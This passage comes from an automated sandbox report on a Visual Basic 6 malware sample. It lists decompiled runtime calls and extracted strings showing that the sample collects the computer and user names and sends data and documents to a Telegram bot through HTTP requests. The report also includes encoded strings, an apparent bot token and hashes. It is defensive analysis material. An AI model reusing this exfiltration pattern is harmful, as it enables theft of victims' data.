                                                                                      • Part of subcall function 0041AE58: __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                      • Part of subcall function 0041AE58: __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                      • Part of subcall function 0041AE58: #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                      • Part of subcall function 0041AE58: #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                      • Part of subcall function 0041AE58: __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                      • Part of subcall function 0041AE58: #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                      • Part of subcall function 0041AE58: __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                      • Part of subcall function 0041AE58: __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                      • Part of subcall function 0041AE58: __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                      • Part of subcall function 0041AE58: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 00419B44
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000,?,?), ref: 00419B5B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004016A6), ref: 00419B6B
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,004016A6), ref: 00419B7E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004016A6), ref: 00419B8B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419BA6
                                                                                    • __vbaStrMove.MSVBVM60(?,?), ref: 00419BBD
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000,?,?), ref: 00419BD4
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,?,?,?,?,?,?,?,?,?,004016A6), ref: 00419BE6
                                                                                    • __vbaStrCat.MSVBVM60(:::,004013A8,0041720C,00000000,?,?,?,?,?,?,?,?,?,004016A6), ref: 00419BFD
                                                                                    • __vbaVarDup.MSVBVM60 ref: 00419C2C
                                                                                    • #666.MSVBVM60(?,?), ref: 00419C39
                                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00419C72
                                                                                    • #666.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00419C85
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00419CD9
                                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,?,00000008), ref: 00419CED
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D08
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D1C
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?,?,00000008), ref: 00419D30
                                                                                    • __vbaVarCat.MSVBVM60(?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000,?), ref: 00419D3D
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000), ref: 00419D43
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,?,00000008,00000000,?,00000008,00000000,?,00000008,?,00000000,?,00000008,00000000), ref: 00419D4D
                                                                                    • __vbaFreeVarList.MSVBVM60(0000000B,?,00000008,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00419D9B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00416924,00000700), ref: 00419DE9
                                                                                    • #645.MSVBVM60(00004008,00000000), ref: 00419E24
                                                                                    • __vbaStrMove.MSVBVM60(00004008,00000000), ref: 00419E2E
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 00419E39
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 00419E50
                                                                                    • __vbaStrCat.MSVBVM60(:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419E6E
                                                                                    • __vbaVarDup.MSVBVM60(:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419E9D
                                                                                    • #666.MSVBVM60(?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EAA
                                                                                    • __vbaVarDup.MSVBVM60(?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EE3
                                                                                    • #666.MSVBVM60(?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419EF6
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419F0D
                                                                                    • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8,0041720C,00000000,00004008,00000000), ref: 00419F21
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8,0041720C), ref: 00419F35
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8), ref: 00419F3B
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,00000008,00000000,?,?,00000008,?,?,?,?,:::,004013A8), ref: 00419F45
                                                                                    • __vbaFreeVarList.MSVBVM60(00000008,?,00000008,?,?,?,?,?,?,00000000,?,?,00000000,?,00000008,00000000), ref: 00419F7E
                                                                                    • __vbaStrCat.MSVBVM60(?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000,?,?,?,?,?), ref: 00419F8E
                                                                                    • __vbaStrMove.MSVBVM60(?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000,?,?,?,?,?), ref: 00419F98
                                                                                    • __vbaStrCat.MSVBVM60(/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FA3
                                                                                    • __vbaStrMove.MSVBVM60(/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FAD
                                                                                    • __vbaStrCat.MSVBVM60(0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FB6
                                                                                    • __vbaStrMove.MSVBVM60(0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C,00000000), ref: 00419FC0
                                                                                    • __vbaStrCat.MSVBVM60(&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C), ref: 00419FCB
                                                                                    • __vbaStrMove.MSVBVM60(&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot,?,?,?,?,?,?,?,0041720C), ref: 00419FD5
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FDE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FE8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,&caption=,00000000,0041720C,00000000,/sendDocument?chat_id=,00000000,?,https://api.telegram.org/bot), ref: 00419FFF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00416924,00000704), ref: 0041A044
                                                                                    • __vbaStrCmp.MSVBVM60(0041720C,?), ref: 0041A060
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,?), ref: 0041A077
                                                                                    • #529.MSVBVM60(00004008,0041720C,?), ref: 0041A0A1
                                                                                    • __vbaExitProc.MSVBVM60(0041720C,00000000,00004008,00000000), ref: 0041A0B2
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A12D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A135
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A13D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A145
                                                                                    • __vbaFreeVar.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A14D
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A155
                                                                                    • __vbaFreeStr.MSVBVM60(0041A163,0041720C,00000000,00004008,00000000), ref: 0041A15D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$List$#666Copy$BstrChkstk$#516#631CheckHresult$#529#537#608#632#645ErrorExitProc
                                                                                    • String ID: &caption=$/sendDocument?chat_id=$7864417F664D41787674$78654378674B467A7379712C2C320509512500391E00380A202979645F3C5D01293B7C38467F062E353C03340D3C$:::$COMPUTERNAME$USERNAME$https://api.telegram.org/bot$rMPwNUypMEMKmmtbHhJrrpIrRFLHRjvoNh
                                                                                    • API String ID: 15591791-2155216444
                                                                                    • Opcode ID: a1dc16fa56941c0d947b16ba45f1b68b0c0ca5286762a38d37cfc0d4cab64067
                                                                                    • Instruction ID: 791649ec814abe3afb33174353489d42ad3a99337645dca8d9169580b313dfd7
                                                                                    • Opcode Fuzzy Hash: a1dc16fa56941c0d947b16ba45f1b68b0c0ca5286762a38d37cfc0d4cab64067
                                                                                    • Instruction Fuzzy Hash: 76028C7690011C9BDB51EBA1CC81BDEB7B8AF08304F5081ABF509B7151EF789B898F95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A18C Relevance: 75.4, APIs: 34, Strings: 9, Instructions: 167COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041A1AA
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 0041A1D7
                                                                                    • __vbaStrCat.MSVBVM60(00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1E6
                                                                                    • __vbaStrMove.MSVBVM60(00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1F0
                                                                                    • __vbaStrCat.MSVBVM60(/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A1FB
                                                                                    • __vbaStrMove.MSVBVM60(/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A205
                                                                                    • __vbaStrCat.MSVBVM60(004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A210
                                                                                    • __vbaStrMove.MSVBVM60(004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A21A
                                                                                    • __vbaStrCat.MSVBVM60(&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A225
                                                                                    • __vbaStrMove.MSVBVM60(&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A22F
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A23A
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A244
                                                                                    • __vbaStrCat.MSVBVM60(&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A24F
                                                                                    • __vbaStrMove.MSVBVM60(&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A259
                                                                                    • __vbaStrCat.MSVBVM60(004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A264
                                                                                    • __vbaStrMove.MSVBVM60(004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0,00000000,/sendMessage?chat_id=,00000000,00000000,https://api.telegram.org/bot,00000001), ref: 0041A26E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,00000000,00000000,?,00000000,004013D0,004016A6,00000000,&caption=,00000000,?,00000000,&text=,00000000,004013D0), ref: 0041A28D
                                                                                    • #716.MSVBVM60(?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2A0
                                                                                    • __vbaObjVar.MSVBVM60(?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2A9
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2B3
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000,?,?,Msxml2.XMLHTTP,00000000,https://api.telegram.org/bot,00000001,?,?,?,?,004016A6), ref: 0041A2BB
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A2F2
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A303
                                                                                    • __vbaChkstk.MSVBVM60 ref: 0041A317
                                                                                    • __vbaLateMemCall.MSVBVM60(?,Open,00000003), ref: 0041A332
                                                                                    • __vbaLateMemCall.MSVBVM60(?,Send,00000000), ref: 0041A344
                                                                                    • __vbaLateMemCallLd.MSVBVM60(?,?,ResponseText,00000000), ref: 0041A35A
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041A363
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041A36D
                                                                                    • __vbaFreeVar.MSVBVM60(00000000), ref: 0041A375
                                                                                    • __vbaExitProc.MSVBVM60(00000000), ref: 0041A386
                                                                                    • __vbaFreeStr.MSVBVM60(0041A3D6,00000000), ref: 0041A3C0
                                                                                    • __vbaFreeObj.MSVBVM60(0041A3D6,00000000), ref: 0041A3C8
                                                                                    • __vbaFreeStr.MSVBVM60(0041A3D6,00000000), ref: 0041A3D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$Chkstk$CallLate$#716AddrefErrorExitListProc
                                                                                    • String ID: &caption=$&text=$/sendMessage?chat_id=$Msxml2.XMLHTTP$Open$POST$ResponseText$Send$https://api.telegram.org/bot
                                                                                    • API String ID: 1207767827-2853864815
                                                                                    • Opcode ID: fc367c3047c0605dc103778644140bca654d6cfbfe7707eac74a5f851dacdf86
                                                                                    • Instruction ID: 5764d51b8fd5494b8e533a0d281c9d12e1aca88c51fe61a14bcd4e9312e3205c
                                                                                    • Opcode Fuzzy Hash: fc367c3047c0605dc103778644140bca654d6cfbfe7707eac74a5f851dacdf86
                                                                                    • Instruction Fuzzy Hash: DB513F72D00108ABDB01FFA5DD42BDE77B9AF04704F60803BF501BB1A2EB795A458B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B5CD Relevance: 37.7, APIs: 25, Instructions: 181COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,004015D8,?,00000002,?,?,004016A6), ref: 0041B5E9
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B619
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B62C
                                                                                    • __vbaLbound.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B63A
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000001,?,00000001,?,000000FF,?,00000002,?,00000000,004016A6,004015D8), ref: 0041B65F
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041B680
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000002,?,?,004016A6), ref: 0041B69A
                                                                                    • __vbaI2I4.MSVBVM60(004015D8,?,00000000,?,00000000,004016A6), ref: 0041B6B2
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000), ref: 0041B6EE
                                                                                    • __vbaDerefAry1.MSVBVM60(004015D8,00000000,004015D8,00000000), ref: 0041B711
                                                                                    • #608.MSVBVM60(?,?,004015D8,00000000,004015D8,00000000), ref: 0041B71E
                                                                                    • __vbaVarCat.MSVBVM60(?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B72F
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B735
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B73F
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,00000008,?,?,004015D8,00000000,004015D8,00000000), ref: 0041B74E
                                                                                    • __vbaStrCopy.MSVBVM60(004015D8,00000000), ref: 0041B765
                                                                                    • __vbaFreeStr.MSVBVM60(0041B79F), ref: 0041B799
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Ary1ChkstkCopyDerefErrorFreeMove$#608LboundListOverflowUbound
                                                                                    • String ID:
                                                                                    • API String ID: 2742792845-0
                                                                                    • Opcode ID: 933fd5c5f8b2a3423e0ed97259365dad75bd5c53feb0989c152de9d692c0184e
                                                                                    • Instruction ID: 5ecf3bcae577b24d721472dbb689d0e8a8752152ae06bcdc95a92d97a5ef9859
                                                                                    • Opcode Fuzzy Hash: 933fd5c5f8b2a3423e0ed97259365dad75bd5c53feb0989c152de9d692c0184e
                                                                                    • Instruction Fuzzy Hash: 82612D76D00249ABCB01EFE5C846BEEBBB8EF04744F50802BF511BB191D77C96458BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041AE58 Relevance: 31.6, APIs: 21, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041AE74
                                                                                    • __vbaLenBstr.MSVBVM60(004014D0,?,?,?,00000000,004016A6), ref: 0041AE8B
                                                                                    • #631.MSVBVM60(004014D0,00000001,00000002), ref: 0041AED8
                                                                                    • __vbaStrMove.MSVBVM60(004014D0,00000001,00000002), ref: 0041AEE2
                                                                                    • #516.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEE8
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEF4
                                                                                    • __vbaFreeVar.MSVBVM60(00000000,004014D0,00000001,00000002), ref: 0041AEFC
                                                                                    • __vbaLenBstr.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF18
                                                                                    • #631.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF34
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF3E
                                                                                    • #516.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF44
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF50
                                                                                    • __vbaFreeVar.MSVBVM60(00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF58
                                                                                    • #608.MSVBVM60(00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF7A
                                                                                    • __vbaVarAdd.MSVBVM60(?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF8B
                                                                                    • __vbaStrVarMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF91
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0,00000001,00000002), ref: 0041AF9B
                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,00000000,?,00000002,00000008,00000002,004014D0,00000000,?,?,?,00000002,00000000,004014D0), ref: 0041AFAA
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041AFBD
                                                                                    • __vbaFreeStr.MSVBVM60(0041AFFF), ref: 0041AFF9
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000002,00000000,004014D0,00000001,00000002), ref: 0041B013
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$#516#631Bstr$#608ChkstkCopyErrorListOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 2799467133-0
                                                                                    • Opcode ID: 1c80654a9a741580ff48f963b013354f664b96ff21e757f4ec07deb7fb294dae
                                                                                    • Instruction ID: 1b483a11e3d0ed2e8c04f0b8c752b5f123881d7f75aaa677409f8459dd4cdbba
                                                                                    • Opcode Fuzzy Hash: 1c80654a9a741580ff48f963b013354f664b96ff21e757f4ec07deb7fb294dae
                                                                                    • Instruction Fuzzy Hash: 0841FE76D00208ABCB05FFE5D845ADEB7B9AF08308F50802AF415B71A1EF7C5A49CB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041B3E6 Relevance: 21.1, APIs: 14, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6), ref: 0041B402
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004016A6), ref: 0041B432
                                                                                    • __vbaNew2.MSVBVM60(004171B8,00000000,000000FF), ref: 0041B44D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004171C8,0000007C), ref: 0041B49A
                                                                                    • __vbaCastObj.MSVBVM60(?,00417E0C), ref: 0041B4B0
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,00417E0C), ref: 0041B4BA
                                                                                    • __vbaFreeObj.MSVBVM60(?,00000000,?,00417E0C), ref: 0041B4C2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00417E0C,00000024), ref: 0041B4F5
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00417E0C,00000034), ref: 0041B539
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00417E0C,00000034), ref: 0041B557
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004171A8), ref: 0041B56F
                                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,004171A8), ref: 0041B579
                                                                                    • __vbaFreeObj.MSVBVM60(0041B5B9,00000000,00000000,00000000,004171A8), ref: 0041B5AB
                                                                                    • __vbaFreeObj.MSVBVM60(0041B5B9,00000000,00000000,00000000,004171A8), ref: 0041B5B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$Cast$ChkstkErrorMoveNew2
                                                                                    • String ID:
                                                                                    • API String ID: 1298571524-0
                                                                                    • Opcode ID: ab8b20f795f7eb68a97f155c5062c8a7b7e17257fe333b2664f392b95f537f49
                                                                                    • Instruction ID: 5352fda1de1bb8fd44a2ca76232ab38bb3ffd0e3920d4e1e32231d360fb3001f
                                                                                    • Opcode Fuzzy Hash: ab8b20f795f7eb68a97f155c5062c8a7b7e17257fe333b2664f392b95f537f49
                                                                                    • Instruction Fuzzy Hash: 4A51DF71D40208AFDB00EFA5C945BDDBBB4EF08708F20806AF511BB2A1D7795A45DFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041ACF6 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,?,00000015,004016A6,00000001), ref: 0041AD12
                                                                                    • __vbaLenBstr.MSVBVM60(004014C0,?,?,?,00000000,004016A6), ref: 0041AD29
